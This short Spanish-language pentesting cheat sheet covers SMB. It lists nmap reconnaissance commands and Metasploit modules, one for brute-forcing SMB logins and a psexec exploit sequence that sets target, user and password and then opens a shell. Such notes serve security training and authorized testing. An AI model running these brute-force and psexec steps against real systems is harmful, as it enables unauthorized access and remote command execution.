SMB
Reconocimiento con NMAP
nmap -sCV <ip>Si pone el siguiente mensaje: Message signing enabled but not required podemos usar PsExec (Nos permite Ejecutar comandos)
El siguiente comando nos permitirá ver el tipo de samba/smb que esta corriendo y después buscamos exploit respecto a la versión
nmap -p 445 --script smb-os-discovery <IP>Fuerza bruta con metasploit
Módulo a utilizar: auxiliary/scanner/smb/smb_login
PsExec con Metasploit (Recomendado)
Módulo a utilizar: exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser <User>
set SMBPass <Password>
exploit
shellPsExec
Si tenemos las credenciales y se cumple la condición mencionada arriba (Message signing enabled but not required) podemos usar la herramienta
Última actualización